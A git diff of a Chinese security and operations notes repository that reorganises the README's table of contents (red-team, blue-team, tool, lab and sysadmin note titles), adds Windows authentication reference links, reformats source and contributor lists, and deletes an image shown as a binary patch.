- [浅学Windows认证](https://b404.xyz/2019/07/23/Study-Windows-Authentication/)
+- [技术干货 | Windows认证体系解读](https://mp.weixin.qq.com/s/MhxGey_xVqv12CUJ7P8UjA)
+- [彻底理解Windows认证 - 议题解读](https://payloads.online/archivers/2018-11-30/1)
+- [NT LAN Manager - Wikipedia](https://en.wikipedia.org/wiki/NT_LAN_Manager)
+- [LAN Manager - Wikipedia](https://en.wikipedia.org/wiki/LAN_Manager)
+- [Windows内网协议学习NTLM篇之NTLM基础介绍](https://www.anquanke.com/post/id/193149)
diff --git a/README.md b/README.md
index fbe6eb90..07904cc9 100644
--- a/README.md
+++ b/README.md
@@ -1,5 +1,5 @@
-
+
@@ -12,7 +12,7 @@
> 万事开头难,然后一直开头一直难...
-
+
**简介:** 本项目的初衷是分享知识资源,内容涉及安全、运维领域,目前主攻 ~~安全研究~~ 预防+治疗脱发问题,对于内容中有疑问或建议欢迎提交 issue,回应时间保证在 12 小时内 (麻烦不要在凌晨提).
@@ -27,125 +27,136 @@
---
-# 目录文件介绍
-## 安全
-
-- [Power-PenTest](./1earn/安全/Power-PenTest.md) : 安全知识的框架 `注: 该文档是连接其下各个目录子文件的树`
-- 笔记
- - BlueTeam
- - [加固](./1earn/安全/笔记/BlueTeam/加固.md) : 系统、应用加固的方法和工具资源
- - [监察](./1earn/安全/笔记/BlueTeam/监察.md) : 有关查杀、监控、蜜罐的资源
- - [取证](./1earn/安全/笔记/BlueTeam/取证.md) : 内容涉及操作系统的取证、web 的取证、文件的取证
- - [应急](./1earn/安全/笔记/BlueTeam/应急.md) : 应急资源、溯源案例
- - RedTeam
- - [安防设备总结](./1earn/安全/笔记/RedTeam/安防设备总结.md)
- - [安卓渗透](./1earn/安全/笔记/RedTeam/安卓渗透.md)
- - [端口安全](./1earn/安全/笔记/RedTeam/端口安全.md) : 记录一些端口渗透时的方法和思路
- - [后渗透](./1earn/安全/笔记/RedTeam/后渗透.md)
- - [逻辑类漏洞](./1earn/安全/笔记/RedTeam/逻辑类漏洞.md) : 整个部分结构大部分基于乌云的几篇密码找回、逻辑漏洞类文章,在其基础上记录和归纳
- - [权限维持](./1earn/安全/笔记/RedTeam/权限维持.md) : 权限维持的各种方法和资源
- - [权限提升](./1earn/安全/笔记/RedTeam/权限提升.md) : 操作系统和数据库的提权方法
- - [软件服务安全](./1earn/安全/笔记/RedTeam/软件服务安全.md) : 记录软件、业务应用服务漏洞的渗透手段和 cve 漏洞
- - [搜索引擎Hacking](./1earn/安全/笔记/RedTeam/搜索引擎Hacking.md) : 收集搜索引擎语法资源
- - [物联网设备渗透](./1earn/安全/笔记/RedTeam/物联网设备渗透.md) : 嵌入式设备相关漏洞利用,不太熟悉这一块,内容不多
- - [协议安全](./1earn/安全/笔记/RedTeam/协议安全.md) : 按照协议归类各种漏洞、攻击手段
- - [信息收集](./1earn/安全/笔记/RedTeam/信息收集.md) : 记录信息收集方面各类技术,如漏扫、IP 扫描、端口扫描、DNS 枚举、目录枚举、指纹等
- - [Linux渗透](./1earn/安全/笔记/RedTeam/Linux渗透.md)
- - [SQLi](./1earn/安全/笔记/RedTeam/SQLi.md) : SQL 注入知识点记录
- - [Web_CVE漏洞记录](./1earn/安全/笔记/RedTeam/Web_CVE漏洞记录.md) : 全面收集 web 漏洞 POC | Payload | exp
- - [Web常见漏洞](./1earn/安全/笔记/RedTeam/Web常见漏洞.md) : 常见 web 漏洞介绍,案例收集
- - [Windows渗透](./1earn/安全/笔记/RedTeam/windows渗透.md)
- - [XSS](./1earn/安全/笔记/RedTeam/xss.md)
- - [XXE](./1earn/安全/笔记/RedTeam/xxe.md)
- - [Crypto](./1earn/安全/笔记/Crypto.md) - 介绍各种编码和加密算法及相关的工具
- - [CTF](./1earn/安全/笔记/CTF.md) - 记录 CTF 相关的工具和 writeup 资源
-- 工具
- - [BurpSuite](./1earn/安全/工具/BurpSuite.md)
- - [CobaltStrike](./1earn/安全/工具/CobaltStrike.md)
- - [Hashcat](./1earn/安全/工具/Hashcat.md)
- - [Kali](./1earn/安全/工具/Kali.md)
- - [Metasploit](./1earn/安全/工具/Metasploit.md)
- - [mimikatz](./1earn/安全/工具/mimikatz.md)
- - [Nmap](./1earn/安全/工具/Nmap.md)
- - [SET](./1earn/安全/工具/SET.md)
- - [Sqlmap](./1earn/安全/工具/Sqlmap.md)
- - [Wfuzz](./1earn/安全/工具/Wfuzz.md)
- - [Wireshark](./1earn/安全/工具/Wireshark.md)
-- 实验
- - HTB
- - Misc
- - [DVWA-WalkThrough](./1earn/安全/实验/Misc/DVWA-WalkThrough.md) - 大名鼎鼎的 DVWA 靶场,新手入门培训必做实验项目
- - [HID-Digispark](./1earn/安全/实验/Misc/HID-Digispark.md) - 基于 ATTINY85 开发板的 Digispark 实验
- - [pikachu-WalkThrough](./1earn/安全/实验/Misc/pikachu-WalkThrough.md) - 非常优秀的 web 基础靶场,与 dvwa 相比 dvwa 更适合教学,pikachu 漏洞种类更多,建议通关顺序 dvwa --> pikachu
- - [SLMail溢出案例](./1earn/安全/实验/Misc/SLMail溢出案例.md) - SLMail 5.5.0 的缓冲区溢出利用实验
- - [sqli-labs-WalkThrough](./1earn/安全/实验/Misc/sqli-labs-WalkThrough.md)
- - [upload-labs-WalkThrough](./1earn/安全/实验/Misc/upload-labs-WalkThrough.md) - 一个总结了各种类型文件上传漏洞的靶场
- - [XSS挑战-WalkThrough](./1earn/安全/实验/Misc/XSS挑战-WalkThrough.md)
- - VulnHub
- - [DC Serial](./1earn/安全/实验/VulnHub/DC) - DC 系列靶场,难度简单至中等,可以学习各种提权和CMS漏洞利用,推荐初学者挑战
- - [Kioptrix Serial](./1earn/安全/实验/VulnHub/Kioptrix) - Kioptrix 系列靶场,难度简单至中等,推荐初学者挑战
- - [Mission-Pumpkin](./1earn/安全/实验/VulnHub/Mission-Pumpkin) - 难度适中,偏向于加解密比较多,漏洞利用内容较少
- - [symfonos Serial](./1earn/安全/实验/VulnHub/symfonos) - 挺有难度的靶场,内容丰富,难度中等,漏洞利用内容很多,推荐有一定经验者挑战
-
-## 运维
-### Linux
-
-- [God-Linux](./1earn/运维/Linux/God-Linux.md) : 记录 Linux 下的骚操作,收集的较少,后面会慢慢添加
-- [Power-Linux](./1earn/运维/Linux/Power-Linux.md) : 配置指南,记录各种服务搭建与配置过程
-- [Secure-Linux](./1earn/运维/Linux/Secure-Linux.md) : Linux 加固+维护+应急响应参考
-- [Speed-Linux](./1earn/运维/Linux/Speed-Linux.md) : 命令速查手册,记录各种基本命令操作
-- 笔记
- - [包管理](./1earn/运维/Linux/笔记/包管理.md) : Linux 各种包管理工具的知识点
- - [发行版](./1earn/运维/Linux/笔记/发行版.md) : Linux 各个发行版本之间的知识
- - [工具](./1earn/运维/Linux/笔记/工具.md) : 收集有趣有用的 Linux 工具
- - [进程](./1earn/运维/Linux/笔记/进程.md) : 科普 Linux 进程的知识
- - [启动过程](./1earn/运维/Linux/笔记/启动过程.md) : 了解 Linux 的启动到底发生了什么
- - [认证](./1earn/运维/Linux/笔记/认证.md) : 了解 Linux 下的认证体系
- - [日志](./1earn/运维/Linux/笔记/日志.md) : 系统日志类型,日志工具
- - [文件](./1earn/运维/Linux/笔记/文件.md) : 概括各文件夹的作用,属性
- - [信息](./1earn/运维/Linux/笔记/信息.md) : 记录收集 Linux 系统软硬件信息的命令
- - [shell编程](./1earn/运维/Linux/笔记/shell编程.md) : shell 编程的知识
-- 实验
- - 各种 linux 服务的搭建过程和案例
-
-### Network
-
-`目前实际工作基本饱和,无法抽出时间把这部分填坑,尽量在今年再补充内容`
-
-- [不同厂商](./1earn/运维/Network/不同厂商.md) : 记录不同厂商配置服务命令的区别
-- [方向实验](./1earn/运维/Network/方向实验.md) : 按方向分类记录配置
-- [理论模型](./1earn/运维/Network/理论模型.md) : 以科来网络通讯协议图为参照记录知识点
-- [速查](./1earn/运维/Network/速查.md) : 速查各类帧、报文格式、掩码等
-- [SDN笔记](./1earn/运维/Network/SDN笔记.md) : 记录以前比赛时 SDN 的题目和命令
-
-### Windows
-
-- [CMD命令](./1earn/运维/Windows/CMD命令.md) : 记录一些 CMD 常用命令
-- [Secure-Win](./1earn/运维/Windows/Secure-Win.md) : windows 加固+维护+应急响应参考
-- 笔记
- - [角色权限](./1earn/运维/Windows/笔记/角色权限.md) : windows 角色内容
- - [认证](./1earn/运维/Windows/笔记/认证.md) : 关于 windows 认证的知识
-- 实验
- - [Windows服务搭建](./1earn/运维/Windows/Windows服务搭建.md) : 记录 windows 搭建服务的步骤
-- Powershell
- - [PowerShell笔记](./1earn/运维/Windows/PowerShell笔记.md) : 记录一些 powershell 常用命令
-
-## 开发
-### 版本控制
-- [Git学习笔记](./1earn/开发/版本控制/Git学习笔记.md) : 记录 git 的用法和平时使用 github 遇到的问题
-
-### 硬件
-- [硬件知识](./1earn/开发/硬件/硬件知识.md) : 一些硬件相关的小知识
-
-### 字符编码
-- [字符编码](./1earn/开发/字符编码/字符编码.md) : 字符编码相关的内容总结
-
-## Plan
-
-- [Misc-Plan](./1earn/Plan/Misc-Plan.md) : 各种小技巧
-- [Team-Plan](./1earn/Plan/Team-Plan.md) : 团队协作解决方案
-- [VM-Plan](./1earn/Plan/VM-Plan.md) : 虚拟机定制规划、VMWare 常见问题记录
-- [Web-Tools](./1earn/Plan/Web-Tools.md) : 在线 web 工具集合
+# 项目文件一览
+
+* 安全
+
+ * [Power-PenTest](./1earn/安全/Power-PenTest.md) : 安全知识的框架 `注: 该文档是连接其下各个目录子文件的树`
+ - **笔记**
+ - BlueTeam
+ * [加固](./1earn/安全/笔记/BlueTeam/加固.md) : 系统、应用加固的方法和工具资源
+ * [监察](./1earn/安全/笔记/BlueTeam/监察.md) : 有关查杀、监控、蜜罐的资源
+ * [取证](./1earn/安全/笔记/BlueTeam/取证.md) : 内容涉及操作系统的取证、web 的取证、文件的取证
+ * [应急](./1earn/安全/笔记/BlueTeam/应急.md) : 应急资源、溯源案例
+ - RedTeam
+ * [安防设备总结](./1earn/安全/笔记/RedTeam/安防设备总结.md)
+ * [安卓渗透](./1earn/安全/笔记/RedTeam/安卓渗透.md)
+ * [端口安全](./1earn/安全/笔记/RedTeam/端口安全.md) : 记录一些端口渗透时的方法和思路
+ * [后渗透](./1earn/安全/笔记/RedTeam/后渗透.md)
+ * [逻辑类漏洞](./1earn/安全/笔记/RedTeam/逻辑类漏洞.md) : 整个部分结构大部分基于乌云的几篇密码找回、逻辑漏洞类文章,在其基础上记录和归纳
+ * [权限维持](./1earn/安全/笔记/RedTeam/权限维持.md) : 权限维持的各种方法和资源
+ * [权限提升](./1earn/安全/笔记/RedTeam/权限提升.md) : 操作系统和数据库的提权方法
+ * [软件服务安全](./1earn/安全/笔记/RedTeam/软件服务安全.md) : 记录软件、业务应用服务漏洞的渗透手段和 cve 漏洞
+ * [搜索引擎Hacking](./1earn/安全/笔记/RedTeam/搜索引擎Hacking.md) : 收集搜索引擎语法资源
+ * [物联网设备渗透](./1earn/安全/笔记/RedTeam/物联网设备渗透.md) : 嵌入式设备相关漏洞利用,不太熟悉这一块,内容不多
+ * [协议安全](./1earn/安全/笔记/RedTeam/协议安全.md) : 按照协议归类各种漏洞、攻击手段
+ * [信息收集](./1earn/安全/笔记/RedTeam/信息收集.md) : 记录信息收集方面各类技术,如漏扫、IP 扫描、端口扫描、DNS 枚举、目录枚举、指纹等
+ * [Linux渗透](./1earn/安全/笔记/RedTeam/Linux渗透.md)
+ * [SQLi](./1earn/安全/笔记/RedTeam/SQLi.md) : SQL 注入知识点记录
+ * [Web_CVE漏洞记录](./1earn/安全/笔记/RedTeam/Web_CVE漏洞记录.md) : 全面收集 web 漏洞 POC | Payload | exp
+ * [Web常见漏洞](./1earn/安全/笔记/RedTeam/Web常见漏洞.md) : 常见 web 漏洞介绍,案例收集
+ * [Windows渗透](./1earn/安全/笔记/RedTeam/windows渗透.md)
+ * [XSS](./1earn/安全/笔记/RedTeam/xss.md)
+ * [XXE](./1earn/安全/笔记/RedTeam/xxe.md)
+ * [Crypto](./1earn/安全/笔记/Crypto.md) - 介绍各种编码和加密算法及相关的工具
+ * [CTF](./1earn/安全/笔记/CTF.md) - 记录 CTF 相关的工具和 writeup 资源
+ - **工具**
+ * [Aircrack](./1earn/安全/工具/Aircrack.md)
+ * [BurpSuite](./1earn/安全/工具/BurpSuite.md)
+ * [CobaltStrike](./1earn/安全/工具/CobaltStrike.md)
+ * [Hashcat](./1earn/安全/工具/Hashcat.md)
+ * [Kali](./1earn/安全/工具/Kali.md)
+ * [Metasploit](./1earn/安全/工具/Metasploit.md)
+ * [mimikatz](./1earn/安全/工具/mimikatz.md)
+ * [Nmap](./1earn/安全/工具/Nmap.md)
+ * [SET](./1earn/安全/工具/SET.md)
+ * [Sqlmap](./1earn/安全/工具/Sqlmap.md)
+ * [Sysmon](./1earn/安全/工具/Sysmon.md)
+ * [Wfuzz](./1earn/安全/工具/Wfuzz.md)
+ * [Wireshark](./1earn/安全/工具/Wireshark.md)
+ - **实验**
+ - HTB
+ - Misc
+ * [DVWA-WalkThrough](./1earn/安全/实验/Misc/DVWA-WalkThrough.md) - 大名鼎鼎的 DVWA 靶场,新手入门培训必做实验项目
+ * [HID-Digispark](./1earn/安全/实验/Misc/HID-Digispark.md) - 基于 ATTINY85 开发板的 Digispark 实验
+ * [pikachu-WalkThrough](./1earn/安全/实验/Misc/pikachu-WalkThrough.md) - 非常优秀的 web 基础靶场,与 dvwa 相比 dvwa 更适合教学,pikachu 漏洞种类更多,建议通关顺序 dvwa --> pikachu
+ * [SLMail溢出案例](./1earn/安全/实验/Misc/SLMail溢出案例.md) - SLMail 5.5.0 的缓冲区溢出利用实验
+ * [sqli-labs-WalkThrough](./1earn/安全/实验/Misc/sqli-labs-WalkThrough.md)
+ * [upload-labs-WalkThrough](./1earn/安全/实验/Misc/upload-labs-WalkThrough.md) - 一个总结了各种类型文件上传漏洞的靶场
+ * [XSS挑战-WalkThrough](./1earn/安全/实验/Misc/XSS挑战-WalkThrough.md)
+ - VulnHub
+ * [DC Serial](./1earn/安全/实验/VulnHub/DC) - DC 系列靶场,难度简单至中等,可以学习各种提权和CMS漏洞利用,推荐初学者挑战
+ * [Kioptrix Serial](./1earn/安全/实验/VulnHub/Kioptrix) - Kioptrix 系列靶场,难度简单至中等,推荐初学者挑战
+ * [Mission-Pumpkin](./1earn/安全/实验/VulnHub/Mission-Pumpkin) - 难度适中,偏向于加解密比较多,漏洞利用内容较少
+ * [symfonos Serial](./1earn/安全/实验/VulnHub/symfonos) - 挺有难度的靶场,内容丰富,难度中等,漏洞利用内容很多,推荐有一定经验者挑战
+
+* 开发
+
+ * **版本控制**
+ * [Git学习笔记](./1earn/开发/版本控制/Git学习笔记.md) : 记录 git 的用法和平时使用 github 遇到的问题
+
+ * **硬件**
+ * [硬件知识](./1earn/开发/硬件/硬件知识.md) : 一些硬件相关的小知识
+
+ * **字符编码**
+ * [字符编码](./1earn/开发/字符编码/字符编码.md) : 字符编码相关的内容总结
+
+* 运维
+
+ * **Linux**
+
+ * [God-Linux](./1earn/运维/Linux/God-Linux.md) : 记录 Linux 下的骚操作,收集的较少,后面会慢慢添加
+ * [Power-Linux](./1earn/运维/Linux/Power-Linux.md) : 配置指南,记录各种服务搭建与配置过程
+ * [Secure-Linux](./1earn/运维/Linux/Secure-Linux.md) : Linux 加固+维护+应急响应参考
+ * [Speed-Linux](./1earn/运维/Linux/Speed-Linux.md) : 命令速查手册,记录各种基本命令操作
+ * 笔记
+ * [包管理](./1earn/运维/Linux/笔记/包管理.md) : Linux 各种包管理工具的知识点
+ * [发行版](./1earn/运维/Linux/笔记/发行版.md) : Linux 各个发行版本之间的知识
+ * [工具](./1earn/运维/Linux/笔记/工具.md) : 收集有趣有用的 Linux 工具
+ * [进程](./1earn/运维/Linux/笔记/进程.md) : 科普 Linux 进程的知识
+ * [启动过程](./1earn/运维/Linux/笔记/启动过程.md) : 了解 Linux 的启动到底发生了什么
+ * [认证](./1earn/运维/Linux/笔记/认证.md) : 了解 Linux 下的认证体系
+ * [日志](./1earn/运维/Linux/笔记/日志.md) : 系统日志类型,日志工具
+ * [文件](./1earn/运维/Linux/笔记/文件.md) : 概括各文件夹的作用,属性
+ * [信息](./1earn/运维/Linux/笔记/信息.md) : 记录收集 Linux 系统软硬件信息的命令
+ * [shell编程](./1earn/运维/Linux/笔记/shell编程.md) : shell 编程的知识
+ * 实验
+ * 各种 linux 服务的搭建过程和案例
+
+ * **Network**
+
+ `目前实际工作基本饱和,无法抽出时间把这部分填坑,尽量在今年再补充内容`
+
+ * [不同厂商](./1earn/运维/Network/不同厂商.md) : 记录不同厂商配置服务命令的区别
+ * [方向实验](./1earn/运维/Network/方向实验.md) : 按方向分类记录配置
+ * [理论模型](./1earn/运维/Network/理论模型.md) : 以科来网络通讯协议图为参照记录知识点
+ * [速查](./1earn/运维/Network/速查.md) : 速查各类帧、报文格式、掩码等
+ * [SDN笔记](./1earn/运维/Network/SDN笔记.md) : 记录以前比赛时 SDN 的题目和命令
+
+ * **Windows**
+
+ * [Secure-Win](./1earn/运维/Windows/Secure-Win.md) : Windows 加固+维护+应急响应参考
+ * [Speed-Win](./1earn/运维/Windows/Speed-Win.md) : 记录 windows 下 CMD 常用命令
+ * 笔记
+ * [工作组](./1earn/运维/Windows/笔记/工作组.md) : 关于 Windows 工作组的概念、相关操作
+ * [角色权限](./1earn/运维/Windows/笔记/角色权限.md) : Windows 角色内容和 Windows Access Token 的相关知识
+ * [认证](./1earn/运维/Windows/笔记/认证.md) : 总结 Windows 本地认证、网络认证和域认证的知识点
+ * [日志](./1earn/运维/Windows/笔记/日志.md) : 总结 Windows 事件日志的相关内容
+ * [域](./1earn/运维/Windows/笔记/域.md) : 记录 Windows 域原理、域结构的知识点
+ * 实验
+ * [Windows故障转移集群](./1earn/运维/Windows/实验/Windows故障转移集群.md) : 记录群集节点的操作
+ * [Windows基础服务搭建](./1earn/运维/Windows/实验/Windows基础服务搭建.md) : 记录 Windows 搭建基础服务的步骤
+ * [Windows域搭建](./1earn/运维/Windows/实验/Windows域搭建.md) : 记录 Windows 搭建域环境的步骤和知识点
+ * Powershell
+ * [PowerShell笔记](./1earn/运维/Windows/PowerShell/PowerShell笔记.md) : 记录一些 powershell 常用命令
+
+* Plan
+
+ * [Markdown](./1earn/Plan/Markdown.md) : 记录 Markdown 语法的笔记
+ * [Misc-Plan](./1earn/Plan/Misc-Plan.md) : 各种小技巧
+ * [Team-Plan](./1earn/Plan/Team-Plan.md) : 团队协作解决方案
+ * [VM-Plan](./1earn/Plan/VM-Plan.md) : VMWare 常见问题记录
+ * [Web-Tools](./1earn/Plan/Web-Tools.md) : 在线 web 工具集合
---
@@ -163,18 +174,18 @@
---
-# 建议和吐槽
+# 阅读建议
`本项目所有文档均在 VScode 编辑器中编写,故只兼容 VScode 侧边预览的 markdown 语法,暂不考虑兼容其他编辑器的 md 语法`
~~由于 github 的 markdown 引擎 kramdown 不支持 [TOC] 链接,以及各种不兼容的排版问题, 导致阅读体验极不友好, 因此~~ 建议还是下载/clone到本地阅读,项目整体约 30M,当然,排版也有以下几种解决方案,不过还是感觉很麻烦,就此作罢
-- [mzlogin/vim-markdown-toc](https://github.com/mzlogin/vim-markdown-toc)
-- [ekalinin/github-markdown-toc.go](https://github.com/ekalinin/github-markdown-toc.go)
-- [ekalinin/github-markdown-toc](https://github.com/ekalinin/github-markdown-toc)
+* [mzlogin/vim-markdown-toc](https://github.com/mzlogin/vim-markdown-toc)
+* [ekalinin/github-markdown-toc.go](https://github.com/ekalinin/github-markdown-toc.go)
+* [ekalinin/github-markdown-toc](https://github.com/ekalinin/github-markdown-toc)
建议的阅读体验
-- [VScode](https://code.visualstudio.com/)+[FiraCode](https://github.com/tonsky/FiraCode) (推荐,整个项目在vscode环境下编写,基本不会出现排版问题)
-- [Typora](https://www.typora.io/)
+* [VScode](https://code.visualstudio.com/)+[FiraCode](https://github.com/tonsky/FiraCode) (推荐,整个项目在vscode环境下编写,基本不会出现排版问题)
+* [Typora](https://www.typora.io/)
> 如果 clone 速度太慢,可以先导入码云中(选择从 URL 中导入),再进行 clone : https://blog.gitee.com/2018/06/05/github_to_gitee/?from=homepage
@@ -185,67 +196,67 @@
# List
以下是我平日收集知识与资源的渠道
-- [每日一文](https://meiriyiwen.com/)
-- [喷嚏网----阅读、发现和分享:8小时外的健康生活!](https://www.dapenti.com/blog/index.asp)
-- [Nicolas Krassas](https://twitter.com/Dinosn)
-- [Binni Shah](https://twitter.com/binitamshah)
-- [360CERT](https://cert.360.cn/daily)
-- [Tuisec安全热点](https://paper.tuisec.win/)
-- [HackerNews](http://hackernews.cc/)
-- [Sec-News 安全文摘](http://wiki.ioin.in/)
-- [SecWiki-安全维基,汇集国内外优秀安全资讯、工具和网站](https://www.sec-wiki.com/)
-- [BleepingComputer](https://www.bleepingcomputer.com/)
-- [HackRead](https://www.hackread.com/)
-- [backup](https://4hou.win/wordpress/)
-- [FreeBuf.COM](https://www.freebuf.com/)
-- [吾爱破解](https://www.52pojie.cn/)
-- [MottoIN](http://www.mottoin.com/)
-- [i春秋论坛](https://bbs.ichunqiu.com/portal.php)
-- [嘶吼 RoarTalk – 回归最本质的信息安全,互联网安全新媒体](http://www.4hou.com/)
-- [安全内参](https://www.secrss.com/)
-- [安全客 - 有思想的安全新媒体](http://bobao.360.cn/)
-- [安全脉搏](https://www.secpulse.com/)
-- [Linux中国开源社区](https://linux.cn/)
-- [看雪安全论坛 - www.pediy.com](http://bbs.pediy.com/)
-- [先知社区](https://xz.aliyun.com/)
-- [My Digital Life Forums](https://forums.mydigitallife.net/)
-- [Linux Commands](https://www.tecmint.com/category/linux-commands/)
-- [阮一峰的网络日志](http://www.ruanyifeng.com/blog/)
-- [少数派 - 高品质数字消费指南](https://sspai.com/)
-- [小众软件](http://www.appinn.com/)
-- [反斗软件](http://www.apprcn.com/)
-- [免費資源網路社群 – 免費資源指南,每日網路資訊與科技新知](https://free.com.tw/)
-- [异次元软件世界 - 软件改变生活!](http://www.iplaysoft.com/)
-- [V2EX](https://www.v2ex.com/)
-- [看雪安全论坛](http://bbs.pediy.com/)
+* [每日一文](https://meiriyiwen.com/)
+* [喷嚏网----阅读、发现和分享:8小时外的健康生活!](https://www.dapenti.com/blog/index.asp)
+* [Nicolas Krassas](https://twitter.com/Dinosn)
+* [Binni Shah](https://twitter.com/binitamshah)
+* [360CERT](https://cert.360.cn/daily)
+* [Tuisec安全热点](https://paper.tuisec.win/)
+* [HackerNews](http://hackernews.cc/)
+* [Sec-News 安全文摘](http://wiki.ioin.in/)
+* [SecWiki-安全维基,汇集国内外优秀安全资讯、工具和网站](https://www.sec-wiki.com/)
+* [BleepingComputer](https://www.bleepingcomputer.com/)
+* [HackRead](https://www.hackread.com/)
+* [backup](https://4hou.win/wordpress/)
+* [FreeBuf.COM](https://www.freebuf.com/)
+* [吾爱破解](https://www.52pojie.cn/)
+* [MottoIN](http://www.mottoin.com/)
+* [i春秋论坛](https://bbs.ichunqiu.com/portal.php)
+* [嘶吼 RoarTalk – 回归最本质的信息安全,互联网安全新媒体](http://www.4hou.com/)
+* [安全内参](https://www.secrss.com/)
+* [安全客 - 有思想的安全新媒体](http://bobao.360.cn/)
+* [安全脉搏](https://www.secpulse.com/)
+* [Linux中国开源社区](https://linux.cn/)
+* [看雪安全论坛 - www.pediy.com](http://bbs.pediy.com/)
+* [先知社区](https://xz.aliyun.com/)
+* [My Digital Life Forums](https://forums.mydigitallife.net/)
+* [Linux Commands](https://www.tecmint.com/category/linux-commands/)
+* [阮一峰的网络日志](http://www.ruanyifeng.com/blog/)
+* [少数派 - 高品质数字消费指南](https://sspai.com/)
+* [小众软件](http://www.appinn.com/)
+* [反斗软件](http://www.apprcn.com/)
+* [免費資源網路社群 – 免費資源指南,每日網路資訊與科技新知](https://free.com.tw/)
+* [异次元软件世界 - 软件改变生活!](http://www.iplaysoft.com/)
+* [V2EX](https://www.v2ex.com/)
+* [看雪安全论坛](http://bbs.pediy.com/)
---
以下是该项目的灵感来源
-- [Micro8-渗透沉思录](https://www.secpulse.com/archives/98814.html)
-- [Teach Yourself Programming in Ten Years](http://norvig.com/21-days.html)
-- [To Find a Better Solution, Ask a Better Question – Member Feature Stories – Medium](https://medium.com/s/story/to-find-a-better-solution-ask-a-better-question-3be7fee5af65)
-- [The Magpie Developer](https://blog.codinghorror.com/the-magpie-developer/)
+* [Micro8-渗透沉思录](https://www.secpulse.com/archives/98814.html)
+* [Teach Yourself Programming in Ten Years](http://norvig.com/21-days.html)
+* [To Find a Better Solution, Ask a Better Question – Member Feature Stories – Medium](https://medium.com/s/story/to-find-a-better-solution-ask-a-better-question-3be7fee5af65)
+* [The Magpie Developer](https://blog.codinghorror.com/the-magpie-developer/)
---
直接或间接贡献过本项目的人员名单(排名不分先后)
-- [Survivor_ms](https://github.com/136510385)
-- [hhkk2334](https://www.thesteel.live/)
-- [幻羽灵殇](https://github.com/syl2293686270)
-- [xidaner](https://github.com/xidaner)
-- [the-fog](https://github.com/the-fog)
-- [BeakHyun](https://github.com/Alienware-OWO)
-- [cililianjie](https://github.com/cililianjie)
-- [mfslog](https://github.com/mfslog)
+* [Survivor_ms](https://github.com/136510385)
+* [hhkk2334](https://www.thesteel.live/)
+* [幻羽灵殇](https://github.com/syl2293686270)
+* [xidaner](https://github.com/xidaner)
+* [the-fog](https://github.com/the-fog)
+* [BeakHyun](https://github.com/Alienware-OWO)
+* [cililianjie](https://github.com/cililianjie)
+* [mfslog](https://github.com/mfslog)
参考过的部分文章作者(排名不分先后)
-- [Tide安全团队](https://github.com/TideSecTeam?type=source) - 取证中很大程度参考其公众号文章内容
-- [theLSA](https://github.com/theLSA) - 取证和Secure-Win中很大程度参考其项目内容
-- [Bypass007](https://github.com/Bypass007/Emergency-Response-Notes) - 应急和Secure-Win中很大程度参考其项目内容
-- [Jirairya](https://b404.xyz/) - windows认证渗透内容大部分参考其文章内容
-- 及其他一堆作者,我都记录在笔记文件末尾的 Source & reference 中
+* [Tide安全团队](https://github.com/TideSecTeam?type=source) - 取证中很大程度参考其公众号文章内容
+* [theLSA](https://github.com/theLSA) - 取证和Secure-Win中很大程度参考其项目内容
+* [Bypass007](https://github.com/Bypass007/Emergency-Response-Notes) - 应急和Secure-Win中很大程度参考其项目内容
+* [Jirairya](https://b404.xyz/) - windows认证渗透内容大部分参考其文章内容
+* 及其他一堆作者,我都记录在笔记文件末尾的 Source & reference 中
---
diff --git a/assets/img/Misc/Misc-Plan.jpg b/assets/img/Misc/Misc-Plan.jpg
deleted file mode 100644
index 1291887e7fed34d7f62d41aebf776a6cf85dc411..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001
literal 144835
zcmbrlg;yL;&@Ma+8!RC>1b24}!QI`16WmE~cL)S`cMIfh48EdX6kN>&O0fdByXT7ZA6KnQ^JD#%F4C@9FN@87*g
z#lk>G$G{@O#(gbBjD)0wuLmOy3pFJ*3ylOfD=W8zl9-T~l98sSk^49ItgLC!|7!*R
z`T-0ia4ozFJct5-!vMi!fc^~vL;wH>4|)~g{|X!k9{dIY5$WFwfb_r5?_2Q>5PM59
z^L|*t*Xb@I*4)a`hF<5--K}bT4-`$1t{&Et`=b*e|3Sj)L%oenT10&U$%u|!s!mx+
zPh^0dEki-UV=w276>L9jD+Gq-Gymt>PgU?A;3ZN;A%OCi3T1$tBSwTSG}JsKCJ2Ki
zC}lX&AbI&x1aaPEF{wcXta;E?-6OnJ#P<)73b*n{gNPrlhR1(aEkQ!2q4-ijBc?W@
zS@aG03jvLpW*s@r5VjBtpjV(EVfPgQCamC}dw~S?yZlU2E&Zc!5k@JekT=RUO%*;R
zGK*EnDEo%G{3=R891A@WO+S!Ium=@*3;mGS{(!{w%p*!Fu#>YoJ0gopqbL$wlyC&X
zEMzKVYaUX-V2afP$H`#4#gu1~4B_yx!y)5q+)-Kh3-2Zr(^NCj)+2L-N)Ha<3n+?u
zi^n8UiEOs2A&-H6)5gdlib*LV!ZB6{pGy=Mk}s70XZM>et^63KFIGK{&;F)eT#`jt
zpoSJA#!6cqQgZ4~0<(;5a}w%4(Jv|TI0X0>L&26M+dlFF;H2kZBfiZju)$)#sQ*km
zidced}Z7vJ^yFp-?rd*UuNe+n6^z
zx_WzORPnb*U_W5`*jMNU%`y6#f$$V8Z+0m(U_K(s3F07=U>gN?4b?G)T)tvj?=aOLXw!{_4?2*1$D`(70j3%XPDU0mp}wKN%I6*MUsX=8IC`AuD;&`3OBv{jK;r(aE?_D{tOu!(AXX$+0U11
zoxSqs+zv->fTEQlh3`D%7zE&IlYuL7H6~G}Mwr8+y#295>J%ztj{y|k<HLi;s1G^?nOEXqA)-aOp~&@hw$*ksdj+()?!p#=6Eo|HfZvw~-!|
zl^vuw%^|Ip1(qAANXB4&w<}T!PN+G*m0U2Yxs=f{pM5Jwh9wla?n^s&%)3DuJ(3@D0W4mHXPPq`X{nA^2e)Nu{e&aM(@+=C0;dsrNdaIpuz
z_Ad98o02&(DZ;o%aRA6SwK~aFp5`CW5a$2p$0#3<<6lrF^+xmI)<|+^#r6D4WqoNzIfKq*=>Kn}!iTIZ4cZUdckWCabd24%V<}_jhpI2=Xog41j3W5600D
zD_kZo3r&3SHIEg3fg;sr@9L_g<7SBm#2#n`
zD&{xkQLfiYz#+H3d%IekL1XPjv`!9ucHxmg%
zm#VspQz`>+=1U05xV@Oygf@*WTI@$@`KmJ!cid*P066=ch^dy@TVG-Aea#{?oKarx
z;nIojAJgQFSVNbanl~gyl!-VQSBWMPOv^IczG$@3m6561{&N!gcblJ%%UKTM@9UtF
